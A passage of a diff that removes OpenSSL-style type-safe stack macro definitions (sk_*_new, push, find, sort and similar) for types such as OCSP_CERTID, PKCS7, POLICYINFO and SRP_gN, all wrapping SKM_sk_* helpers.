-#define sk_MIME_PARAM_zero(st) SKM_sk_zero(MIME_PARAM, (st))
-#define sk_MIME_PARAM_push(st, val) SKM_sk_push(MIME_PARAM, (st), (val))
-#define sk_MIME_PARAM_unshift(st, val) SKM_sk_unshift(MIME_PARAM, (st), (val))
-#define sk_MIME_PARAM_find(st, val) SKM_sk_find(MIME_PARAM, (st), (val))
-#define sk_MIME_PARAM_find_ex(st, val) SKM_sk_find_ex(MIME_PARAM, (st), (val))
-#define sk_MIME_PARAM_delete(st, i) SKM_sk_delete(MIME_PARAM, (st), (i))
-#define sk_MIME_PARAM_delete_ptr(st, ptr) SKM_sk_delete_ptr(MIME_PARAM, (st), (ptr))
-#define sk_MIME_PARAM_insert(st, val, i) SKM_sk_insert(MIME_PARAM, (st), (val), (i))
-#define sk_MIME_PARAM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MIME_PARAM, (st), (cmp))
-#define sk_MIME_PARAM_dup(st) SKM_sk_dup(MIME_PARAM, st)
-#define sk_MIME_PARAM_pop_free(st, free_func) SKM_sk_pop_free(MIME_PARAM, (st), (free_func))
-#define sk_MIME_PARAM_shift(st) SKM_sk_shift(MIME_PARAM, (st))
-#define sk_MIME_PARAM_pop(st) SKM_sk_pop(MIME_PARAM, (st))
-#define sk_MIME_PARAM_sort(st) SKM_sk_sort(MIME_PARAM, (st))
-#define sk_MIME_PARAM_is_sorted(st) SKM_sk_is_sorted(MIME_PARAM, (st))
-
-#define sk_NAME_FUNCS_new(cmp) SKM_sk_new(NAME_FUNCS, (cmp))
-#define sk_NAME_FUNCS_new_null() SKM_sk_new_null(NAME_FUNCS)
-#define sk_NAME_FUNCS_free(st) SKM_sk_free(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_num(st) SKM_sk_num(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_value(st, i) SKM_sk_value(NAME_FUNCS, (st), (i))
-#define sk_NAME_FUNCS_set(st, i, val) SKM_sk_set(NAME_FUNCS, (st), (i), (val))
-#define sk_NAME_FUNCS_zero(st) SKM_sk_zero(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_push(st, val) SKM_sk_push(NAME_FUNCS, (st), (val))
-#define sk_NAME_FUNCS_unshift(st, val) SKM_sk_unshift(NAME_FUNCS, (st), (val))
-#define sk_NAME_FUNCS_find(st, val) SKM_sk_find(NAME_FUNCS, (st), (val))
-#define sk_NAME_FUNCS_find_ex(st, val) SKM_sk_find_ex(NAME_FUNCS, (st), (val))
-#define sk_NAME_FUNCS_delete(st, i) SKM_sk_delete(NAME_FUNCS, (st), (i))
-#define sk_NAME_FUNCS_delete_ptr(st, ptr) SKM_sk_delete_ptr(NAME_FUNCS, (st), (ptr))
-#define sk_NAME_FUNCS_insert(st, val, i) SKM_sk_insert(NAME_FUNCS, (st), (val), (i))
-#define sk_NAME_FUNCS_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(NAME_FUNCS, (st), (cmp))
-#define sk_NAME_FUNCS_dup(st) SKM_sk_dup(NAME_FUNCS, st)
-#define sk_NAME_FUNCS_pop_free(st, free_func) SKM_sk_pop_free(NAME_FUNCS, (st), (free_func))
-#define sk_NAME_FUNCS_shift(st) SKM_sk_shift(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_pop(st) SKM_sk_pop(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_sort(st) SKM_sk_sort(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_is_sorted(st) SKM_sk_is_sorted(NAME_FUNCS, (st))
-
-#define sk_OCSP_CERTID_new(cmp) SKM_sk_new(OCSP_CERTID, (cmp))
-#define sk_OCSP_CERTID_new_null() SKM_sk_new_null(OCSP_CERTID)
-#define sk_OCSP_CERTID_free(st) SKM_sk_free(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_num(st) SKM_sk_num(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_value(st, i) SKM_sk_value(OCSP_CERTID, (st), (i))
-#define sk_OCSP_CERTID_set(st, i, val) SKM_sk_set(OCSP_CERTID, (st), (i), (val))
-#define sk_OCSP_CERTID_zero(st) SKM_sk_zero(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_push(st, val) SKM_sk_push(OCSP_CERTID, (st), (val))
-#define sk_OCSP_CERTID_unshift(st, val) SKM_sk_unshift(OCSP_CERTID, (st), (val))
-#define sk_OCSP_CERTID_find(st, val) SKM_sk_find(OCSP_CERTID, (st), (val))
-#define sk_OCSP_CERTID_find_ex(st, val) SKM_sk_find_ex(OCSP_CERTID, (st), (val))
-#define sk_OCSP_CERTID_delete(st, i) SKM_sk_delete(OCSP_CERTID, (st), (i))
-#define sk_OCSP_CERTID_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_CERTID, (st), (ptr))
-#define sk_OCSP_CERTID_insert(st, val, i) SKM_sk_insert(OCSP_CERTID, (st), (val), (i))
-#define sk_OCSP_CERTID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_CERTID, (st), (cmp))
-#define sk_OCSP_CERTID_dup(st) SKM_sk_dup(OCSP_CERTID, st)
-#define sk_OCSP_CERTID_pop_free(st, free_func) SKM_sk_pop_free(OCSP_CERTID, (st), (free_func))
-#define sk_OCSP_CERTID_shift(st) SKM_sk_shift(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_pop(st) SKM_sk_pop(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_sort(st) SKM_sk_sort(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_is_sorted(st) SKM_sk_is_sorted(OCSP_CERTID, (st))
-
-#define sk_OCSP_ONEREQ_new(cmp) SKM_sk_new(OCSP_ONEREQ, (cmp))
-#define sk_OCSP_ONEREQ_new_null() SKM_sk_new_null(OCSP_ONEREQ)
-#define sk_OCSP_ONEREQ_free(st) SKM_sk_free(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_num(st) SKM_sk_num(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_value(st, i) SKM_sk_value(OCSP_ONEREQ, (st), (i))
-#define sk_OCSP_ONEREQ_set(st, i, val) SKM_sk_set(OCSP_ONEREQ, (st), (i), (val))
-#define sk_OCSP_ONEREQ_zero(st) SKM_sk_zero(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_push(st, val) SKM_sk_push(OCSP_ONEREQ, (st), (val))
-#define sk_OCSP_ONEREQ_unshift(st, val) SKM_sk_unshift(OCSP_ONEREQ, (st), (val))
-#define sk_OCSP_ONEREQ_find(st, val) SKM_sk_find(OCSP_ONEREQ, (st), (val))
-#define sk_OCSP_ONEREQ_find_ex(st, val) SKM_sk_find_ex(OCSP_ONEREQ, (st), (val))
-#define sk_OCSP_ONEREQ_delete(st, i) SKM_sk_delete(OCSP_ONEREQ, (st), (i))
-#define sk_OCSP_ONEREQ_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_ONEREQ, (st), (ptr))
-#define sk_OCSP_ONEREQ_insert(st, val, i) SKM_sk_insert(OCSP_ONEREQ, (st), (val), (i))
-#define sk_OCSP_ONEREQ_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_ONEREQ, (st), (cmp))
-#define sk_OCSP_ONEREQ_dup(st) SKM_sk_dup(OCSP_ONEREQ, st)
-#define sk_OCSP_ONEREQ_pop_free(st, free_func) SKM_sk_pop_free(OCSP_ONEREQ, (st), (free_func))
-#define sk_OCSP_ONEREQ_shift(st) SKM_sk_shift(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_pop(st) SKM_sk_pop(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_sort(st) SKM_sk_sort(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_is_sorted(st) SKM_sk_is_sorted(OCSP_ONEREQ, (st))
-
-#define sk_OCSP_RESPID_new(cmp) SKM_sk_new(OCSP_RESPID, (cmp))
-#define sk_OCSP_RESPID_new_null() SKM_sk_new_null(OCSP_RESPID)
-#define sk_OCSP_RESPID_free(st) SKM_sk_free(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_num(st) SKM_sk_num(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_value(st, i) SKM_sk_value(OCSP_RESPID, (st), (i))
-#define sk_OCSP_RESPID_set(st, i, val) SKM_sk_set(OCSP_RESPID, (st), (i), (val))
-#define sk_OCSP_RESPID_zero(st) SKM_sk_zero(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_push(st, val) SKM_sk_push(OCSP_RESPID, (st), (val))
-#define sk_OCSP_RESPID_unshift(st, val) SKM_sk_unshift(OCSP_RESPID, (st), (val))
-#define sk_OCSP_RESPID_find(st, val) SKM_sk_find(OCSP_RESPID, (st), (val))
-#define sk_OCSP_RESPID_find_ex(st, val) SKM_sk_find_ex(OCSP_RESPID, (st), (val))
-#define sk_OCSP_RESPID_delete(st, i) SKM_sk_delete(OCSP_RESPID, (st), (i))
-#define sk_OCSP_RESPID_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_RESPID, (st), (ptr))
-#define sk_OCSP_RESPID_insert(st, val, i) SKM_sk_insert(OCSP_RESPID, (st), (val), (i))
-#define sk_OCSP_RESPID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_RESPID, (st), (cmp))
-#define sk_OCSP_RESPID_dup(st) SKM_sk_dup(OCSP_RESPID, st)
-#define sk_OCSP_RESPID_pop_free(st, free_func) SKM_sk_pop_free(OCSP_RESPID, (st), (free_func))
-#define sk_OCSP_RESPID_shift(st) SKM_sk_shift(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_pop(st) SKM_sk_pop(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_sort(st) SKM_sk_sort(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_is_sorted(st) SKM_sk_is_sorted(OCSP_RESPID, (st))
-
-#define sk_OCSP_SINGLERESP_new(cmp) SKM_sk_new(OCSP_SINGLERESP, (cmp))
-#define sk_OCSP_SINGLERESP_new_null() SKM_sk_new_null(OCSP_SINGLERESP)
-#define sk_OCSP_SINGLERESP_free(st) SKM_sk_free(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_num(st) SKM_sk_num(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_value(st, i) SKM_sk_value(OCSP_SINGLERESP, (st), (i))
-#define sk_OCSP_SINGLERESP_set(st, i, val) SKM_sk_set(OCSP_SINGLERESP, (st), (i), (val))
-#define sk_OCSP_SINGLERESP_zero(st) SKM_sk_zero(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_push(st, val) SKM_sk_push(OCSP_SINGLERESP, (st), (val))
-#define sk_OCSP_SINGLERESP_unshift(st, val) SKM_sk_unshift(OCSP_SINGLERESP, (st), (val))
-#define sk_OCSP_SINGLERESP_find(st, val) SKM_sk_find(OCSP_SINGLERESP, (st), (val))
-#define sk_OCSP_SINGLERESP_find_ex(st, val) SKM_sk_find_ex(OCSP_SINGLERESP, (st), (val))
-#define sk_OCSP_SINGLERESP_delete(st, i) SKM_sk_delete(OCSP_SINGLERESP, (st), (i))
-#define sk_OCSP_SINGLERESP_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_SINGLERESP, (st), (ptr))
-#define sk_OCSP_SINGLERESP_insert(st, val, i) SKM_sk_insert(OCSP_SINGLERESP, (st), (val), (i))
-#define sk_OCSP_SINGLERESP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_SINGLERESP, (st), (cmp))
-#define sk_OCSP_SINGLERESP_dup(st) SKM_sk_dup(OCSP_SINGLERESP, st)
-#define sk_OCSP_SINGLERESP_pop_free(st, free_func) SKM_sk_pop_free(OCSP_SINGLERESP, (st), (free_func))
-#define sk_OCSP_SINGLERESP_shift(st) SKM_sk_shift(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_pop(st) SKM_sk_pop(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_sort(st) SKM_sk_sort(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_is_sorted(st) SKM_sk_is_sorted(OCSP_SINGLERESP, (st))
-
-#define sk_PKCS12_SAFEBAG_new(cmp) SKM_sk_new(PKCS12_SAFEBAG, (cmp))
-#define sk_PKCS12_SAFEBAG_new_null() SKM_sk_new_null(PKCS12_SAFEBAG)
-#define sk_PKCS12_SAFEBAG_free(st) SKM_sk_free(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_num(st) SKM_sk_num(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_value(st, i) SKM_sk_value(PKCS12_SAFEBAG, (st), (i))
-#define sk_PKCS12_SAFEBAG_set(st, i, val) SKM_sk_set(PKCS12_SAFEBAG, (st), (i), (val))
-#define sk_PKCS12_SAFEBAG_zero(st) SKM_sk_zero(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_push(st, val) SKM_sk_push(PKCS12_SAFEBAG, (st), (val))
-#define sk_PKCS12_SAFEBAG_unshift(st, val) SKM_sk_unshift(PKCS12_SAFEBAG, (st), (val))
-#define sk_PKCS12_SAFEBAG_find(st, val) SKM_sk_find(PKCS12_SAFEBAG, (st), (val))
-#define sk_PKCS12_SAFEBAG_find_ex(st, val) SKM_sk_find_ex(PKCS12_SAFEBAG, (st), (val))
-#define sk_PKCS12_SAFEBAG_delete(st, i) SKM_sk_delete(PKCS12_SAFEBAG, (st), (i))
-#define sk_PKCS12_SAFEBAG_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS12_SAFEBAG, (st), (ptr))
-#define sk_PKCS12_SAFEBAG_insert(st, val, i) SKM_sk_insert(PKCS12_SAFEBAG, (st), (val), (i))
-#define sk_PKCS12_SAFEBAG_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS12_SAFEBAG, (st), (cmp))
-#define sk_PKCS12_SAFEBAG_dup(st) SKM_sk_dup(PKCS12_SAFEBAG, st)
-#define sk_PKCS12_SAFEBAG_pop_free(st, free_func) SKM_sk_pop_free(PKCS12_SAFEBAG, (st), (free_func))
-#define sk_PKCS12_SAFEBAG_shift(st) SKM_sk_shift(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_pop(st) SKM_sk_pop(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_sort(st) SKM_sk_sort(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_is_sorted(st) SKM_sk_is_sorted(PKCS12_SAFEBAG, (st))
-
-#define sk_PKCS7_new(cmp) SKM_sk_new(PKCS7, (cmp))
-#define sk_PKCS7_new_null() SKM_sk_new_null(PKCS7)
-#define sk_PKCS7_free(st) SKM_sk_free(PKCS7, (st))
-#define sk_PKCS7_num(st) SKM_sk_num(PKCS7, (st))
-#define sk_PKCS7_value(st, i) SKM_sk_value(PKCS7, (st), (i))
-#define sk_PKCS7_set(st, i, val) SKM_sk_set(PKCS7, (st), (i), (val))
-#define sk_PKCS7_zero(st) SKM_sk_zero(PKCS7, (st))
-#define sk_PKCS7_push(st, val) SKM_sk_push(PKCS7, (st), (val))
-#define sk_PKCS7_unshift(st, val) SKM_sk_unshift(PKCS7, (st), (val))
-#define sk_PKCS7_find(st, val) SKM_sk_find(PKCS7, (st), (val))
-#define sk_PKCS7_find_ex(st, val) SKM_sk_find_ex(PKCS7, (st), (val))
-#define sk_PKCS7_delete(st, i) SKM_sk_delete(PKCS7, (st), (i))
-#define sk_PKCS7_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7, (st), (ptr))
-#define sk_PKCS7_insert(st, val, i) SKM_sk_insert(PKCS7, (st), (val), (i))
-#define sk_PKCS7_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7, (st), (cmp))
-#define sk_PKCS7_dup(st) SKM_sk_dup(PKCS7, st)
-#define sk_PKCS7_pop_free(st, free_func) SKM_sk_pop_free(PKCS7, (st), (free_func))
-#define sk_PKCS7_shift(st) SKM_sk_shift(PKCS7, (st))
-#define sk_PKCS7_pop(st) SKM_sk_pop(PKCS7, (st))
-#define sk_PKCS7_sort(st) SKM_sk_sort(PKCS7, (st))
-#define sk_PKCS7_is_sorted(st) SKM_sk_is_sorted(PKCS7, (st))
-
-#define sk_PKCS7_RECIP_INFO_new(cmp) SKM_sk_new(PKCS7_RECIP_INFO, (cmp))
-#define sk_PKCS7_RECIP_INFO_new_null() SKM_sk_new_null(PKCS7_RECIP_INFO)
-#define sk_PKCS7_RECIP_INFO_free(st) SKM_sk_free(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_num(st) SKM_sk_num(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_value(st, i) SKM_sk_value(PKCS7_RECIP_INFO, (st), (i))
-#define sk_PKCS7_RECIP_INFO_set(st, i, val) SKM_sk_set(PKCS7_RECIP_INFO, (st), (i), (val))
-#define sk_PKCS7_RECIP_INFO_zero(st) SKM_sk_zero(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_push(st, val) SKM_sk_push(PKCS7_RECIP_INFO, (st), (val))
-#define sk_PKCS7_RECIP_INFO_unshift(st, val) SKM_sk_unshift(PKCS7_RECIP_INFO, (st), (val))
-#define sk_PKCS7_RECIP_INFO_find(st, val) SKM_sk_find(PKCS7_RECIP_INFO, (st), (val))
-#define sk_PKCS7_RECIP_INFO_find_ex(st, val) SKM_sk_find_ex(PKCS7_RECIP_INFO, (st), (val))
-#define sk_PKCS7_RECIP_INFO_delete(st, i) SKM_sk_delete(PKCS7_RECIP_INFO, (st), (i))
-#define sk_PKCS7_RECIP_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7_RECIP_INFO, (st), (ptr))
-#define sk_PKCS7_RECIP_INFO_insert(st, val, i) SKM_sk_insert(PKCS7_RECIP_INFO, (st), (val), (i))
-#define sk_PKCS7_RECIP_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7_RECIP_INFO, (st), (cmp))
-#define sk_PKCS7_RECIP_INFO_dup(st) SKM_sk_dup(PKCS7_RECIP_INFO, st)
-#define sk_PKCS7_RECIP_INFO_pop_free(st, free_func) SKM_sk_pop_free(PKCS7_RECIP_INFO, (st), (free_func))
-#define sk_PKCS7_RECIP_INFO_shift(st) SKM_sk_shift(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_pop(st) SKM_sk_pop(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_sort(st) SKM_sk_sort(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_is_sorted(st) SKM_sk_is_sorted(PKCS7_RECIP_INFO, (st))
-
-#define sk_PKCS7_SIGNER_INFO_new(cmp) SKM_sk_new(PKCS7_SIGNER_INFO, (cmp))
-#define sk_PKCS7_SIGNER_INFO_new_null() SKM_sk_new_null(PKCS7_SIGNER_INFO)
-#define sk_PKCS7_SIGNER_INFO_free(st) SKM_sk_free(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_num(st) SKM_sk_num(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_value(st, i) SKM_sk_value(PKCS7_SIGNER_INFO, (st), (i))
-#define sk_PKCS7_SIGNER_INFO_set(st, i, val) SKM_sk_set(PKCS7_SIGNER_INFO, (st), (i), (val))
-#define sk_PKCS7_SIGNER_INFO_zero(st) SKM_sk_zero(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_push(st, val) SKM_sk_push(PKCS7_SIGNER_INFO, (st), (val))
-#define sk_PKCS7_SIGNER_INFO_unshift(st, val) SKM_sk_unshift(PKCS7_SIGNER_INFO, (st), (val))
-#define sk_PKCS7_SIGNER_INFO_find(st, val) SKM_sk_find(PKCS7_SIGNER_INFO, (st), (val))
-#define sk_PKCS7_SIGNER_INFO_find_ex(st, val) SKM_sk_find_ex(PKCS7_SIGNER_INFO, (st), (val))
-#define sk_PKCS7_SIGNER_INFO_delete(st, i) SKM_sk_delete(PKCS7_SIGNER_INFO, (st), (i))
-#define sk_PKCS7_SIGNER_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7_SIGNER_INFO, (st), (ptr))
-#define sk_PKCS7_SIGNER_INFO_insert(st, val, i) SKM_sk_insert(PKCS7_SIGNER_INFO, (st), (val), (i))
-#define sk_PKCS7_SIGNER_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7_SIGNER_INFO, (st), (cmp))
-#define sk_PKCS7_SIGNER_INFO_dup(st) SKM_sk_dup(PKCS7_SIGNER_INFO, st)
-#define sk_PKCS7_SIGNER_INFO_pop_free(st, free_func) SKM_sk_pop_free(PKCS7_SIGNER_INFO, (st), (free_func))
-#define sk_PKCS7_SIGNER_INFO_shift(st) SKM_sk_shift(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_pop(st) SKM_sk_pop(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_sort(st) SKM_sk_sort(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_is_sorted(st) SKM_sk_is_sorted(PKCS7_SIGNER_INFO, (st))
-
-#define sk_POLICYINFO_new(cmp) SKM_sk_new(POLICYINFO, (cmp))
-#define sk_POLICYINFO_new_null() SKM_sk_new_null(POLICYINFO)
-#define sk_POLICYINFO_free(st) SKM_sk_free(POLICYINFO, (st))
-#define sk_POLICYINFO_num(st) SKM_sk_num(POLICYINFO, (st))
-#define sk_POLICYINFO_value(st, i) SKM_sk_value(POLICYINFO, (st), (i))
-#define sk_POLICYINFO_set(st, i, val) SKM_sk_set(POLICYINFO, (st), (i), (val))
-#define sk_POLICYINFO_zero(st) SKM_sk_zero(POLICYINFO, (st))
-#define sk_POLICYINFO_push(st, val) SKM_sk_push(POLICYINFO, (st), (val))
-#define sk_POLICYINFO_unshift(st, val) SKM_sk_unshift(POLICYINFO, (st), (val))
-#define sk_POLICYINFO_find(st, val) SKM_sk_find(POLICYINFO, (st), (val))
-#define sk_POLICYINFO_find_ex(st, val) SKM_sk_find_ex(POLICYINFO, (st), (val))
-#define sk_POLICYINFO_delete(st, i) SKM_sk_delete(POLICYINFO, (st), (i))
-#define sk_POLICYINFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICYINFO, (st), (ptr))
-#define sk_POLICYINFO_insert(st, val, i) SKM_sk_insert(POLICYINFO, (st), (val), (i))
-#define sk_POLICYINFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICYINFO, (st), (cmp))
-#define sk_POLICYINFO_dup(st) SKM_sk_dup(POLICYINFO, st)
-#define sk_POLICYINFO_pop_free(st, free_func) SKM_sk_pop_free(POLICYINFO, (st), (free_func))
-#define sk_POLICYINFO_shift(st) SKM_sk_shift(POLICYINFO, (st))
-#define sk_POLICYINFO_pop(st) SKM_sk_pop(POLICYINFO, (st))
-#define sk_POLICYINFO_sort(st) SKM_sk_sort(POLICYINFO, (st))
-#define sk_POLICYINFO_is_sorted(st) SKM_sk_is_sorted(POLICYINFO, (st))
-
-#define sk_POLICYQUALINFO_new(cmp) SKM_sk_new(POLICYQUALINFO, (cmp))
-#define sk_POLICYQUALINFO_new_null() SKM_sk_new_null(POLICYQUALINFO)
-#define sk_POLICYQUALINFO_free(st) SKM_sk_free(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_num(st) SKM_sk_num(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_value(st, i) SKM_sk_value(POLICYQUALINFO, (st), (i))
-#define sk_POLICYQUALINFO_set(st, i, val) SKM_sk_set(POLICYQUALINFO, (st), (i), (val))
-#define sk_POLICYQUALINFO_zero(st) SKM_sk_zero(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_push(st, val) SKM_sk_push(POLICYQUALINFO, (st), (val))
-#define sk_POLICYQUALINFO_unshift(st, val) SKM_sk_unshift(POLICYQUALINFO, (st), (val))
-#define sk_POLICYQUALINFO_find(st, val) SKM_sk_find(POLICYQUALINFO, (st), (val))
-#define sk_POLICYQUALINFO_find_ex(st, val) SKM_sk_find_ex(POLICYQUALINFO, (st), (val))
-#define sk_POLICYQUALINFO_delete(st, i) SKM_sk_delete(POLICYQUALINFO, (st), (i))
-#define sk_POLICYQUALINFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICYQUALINFO, (st), (ptr))
-#define sk_POLICYQUALINFO_insert(st, val, i) SKM_sk_insert(POLICYQUALINFO, (st), (val), (i))
-#define sk_POLICYQUALINFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICYQUALINFO, (st), (cmp))
-#define sk_POLICYQUALINFO_dup(st) SKM_sk_dup(POLICYQUALINFO, st)
-#define sk_POLICYQUALINFO_pop_free(st, free_func) SKM_sk_pop_free(POLICYQUALINFO, (st), (free_func))
-#define sk_POLICYQUALINFO_shift(st) SKM_sk_shift(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_pop(st) SKM_sk_pop(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_sort(st) SKM_sk_sort(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_is_sorted(st) SKM_sk_is_sorted(POLICYQUALINFO, (st))
-
-#define sk_POLICY_MAPPING_new(cmp) SKM_sk_new(POLICY_MAPPING, (cmp))
-#define sk_POLICY_MAPPING_new_null() SKM_sk_new_null(POLICY_MAPPING)
-#define sk_POLICY_MAPPING_free(st) SKM_sk_free(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_num(st) SKM_sk_num(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_value(st, i) SKM_sk_value(POLICY_MAPPING, (st), (i))
-#define sk_POLICY_MAPPING_set(st, i, val) SKM_sk_set(POLICY_MAPPING, (st), (i), (val))
-#define sk_POLICY_MAPPING_zero(st) SKM_sk_zero(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_push(st, val) SKM_sk_push(POLICY_MAPPING, (st), (val))
-#define sk_POLICY_MAPPING_unshift(st, val) SKM_sk_unshift(POLICY_MAPPING, (st), (val))
-#define sk_POLICY_MAPPING_find(st, val) SKM_sk_find(POLICY_MAPPING, (st), (val))
-#define sk_POLICY_MAPPING_find_ex(st, val) SKM_sk_find_ex(POLICY_MAPPING, (st), (val))
-#define sk_POLICY_MAPPING_delete(st, i) SKM_sk_delete(POLICY_MAPPING, (st), (i))
-#define sk_POLICY_MAPPING_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICY_MAPPING, (st), (ptr))
-#define sk_POLICY_MAPPING_insert(st, val, i) SKM_sk_insert(POLICY_MAPPING, (st), (val), (i))
-#define sk_POLICY_MAPPING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICY_MAPPING, (st), (cmp))
-#define sk_POLICY_MAPPING_dup(st) SKM_sk_dup(POLICY_MAPPING, st)
-#define sk_POLICY_MAPPING_pop_free(st, free_func) SKM_sk_pop_free(POLICY_MAPPING, (st), (free_func))
-#define sk_POLICY_MAPPING_shift(st) SKM_sk_shift(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_pop(st) SKM_sk_pop(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_sort(st) SKM_sk_sort(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_is_sorted(st) SKM_sk_is_sorted(POLICY_MAPPING, (st))
-
-#define sk_SRP_gN_new(cmp) SKM_sk_new(SRP_gN, (cmp))
-#define sk_SRP_gN_new_null() SKM_sk_new_null(SRP_gN)
-#define sk_SRP_gN_free(st) SKM_sk_free(SRP_gN, (st))
-#define sk_SRP_gN_num(st) SKM_sk_num(SRP_gN, (st))
-#define sk_SRP_gN_value(st, i) SKM_sk_value(SRP_gN, (st), (i))
-#define sk_SRP_gN_set(st, i, val) SKM_sk_set(SRP_gN, (st), (i), (val))
-#define sk_SRP_gN_zero(st) SKM_sk_zero(SRP_gN, (st))
-#define sk_SRP_gN_push(st, val) SKM_sk_push(SRP_gN, (st), (val))
-#define sk_SRP_gN_unshift(st, val) SKM_sk_unshift(SRP_gN, (st), (val))
-#define sk_SRP_gN_find(st, val) SKM_sk_find(SRP_gN, (st), (val))
-#define sk_SRP_gN_find_ex(st, val) SKM_sk_find_ex(SRP_gN, (st), (val))
-#define sk_SRP_gN_delete(st, i) SKM_sk_delete(SRP_gN, (st), (i))
-#define sk_SRP_gN_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_gN, (st), (ptr))
-#define sk_SRP_gN_insert(st, val, i) SKM_sk_insert(SRP_gN, (st), (val), (i))
-#define sk_SRP_gN_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_gN, (st), (cmp))
-#define sk_SRP_gN_dup(st) SKM_sk_dup(SRP_gN, st)
-#define sk_SRP_gN_pop_free(st, free_func) SKM_sk_pop_free(SRP_gN, (st), (free_func))
-#define sk_SRP_gN_shift(st) SKM_sk_shift(SRP_gN, (st))
-#define sk_SRP_gN_pop(st) SKM_sk_pop(SRP_gN, (st))
-#define sk_SRP_gN_sort(st) SKM_sk_sort(SRP_gN, (st))
-#define sk_SRP_gN_is_sorted(st) SKM_sk_is_sorted(SRP_gN, (st))
-
-#define sk_SRP_gN_cache_new(cmp) SKM_sk_new(SRP_gN_cache, (cmp))
-#define sk_SRP_gN_cache_new_null() SKM_sk_new_null(SRP_gN_cache)
-#define sk_SRP_gN_cache_free(st) SKM_sk_free(SRP_gN_cache, (st))
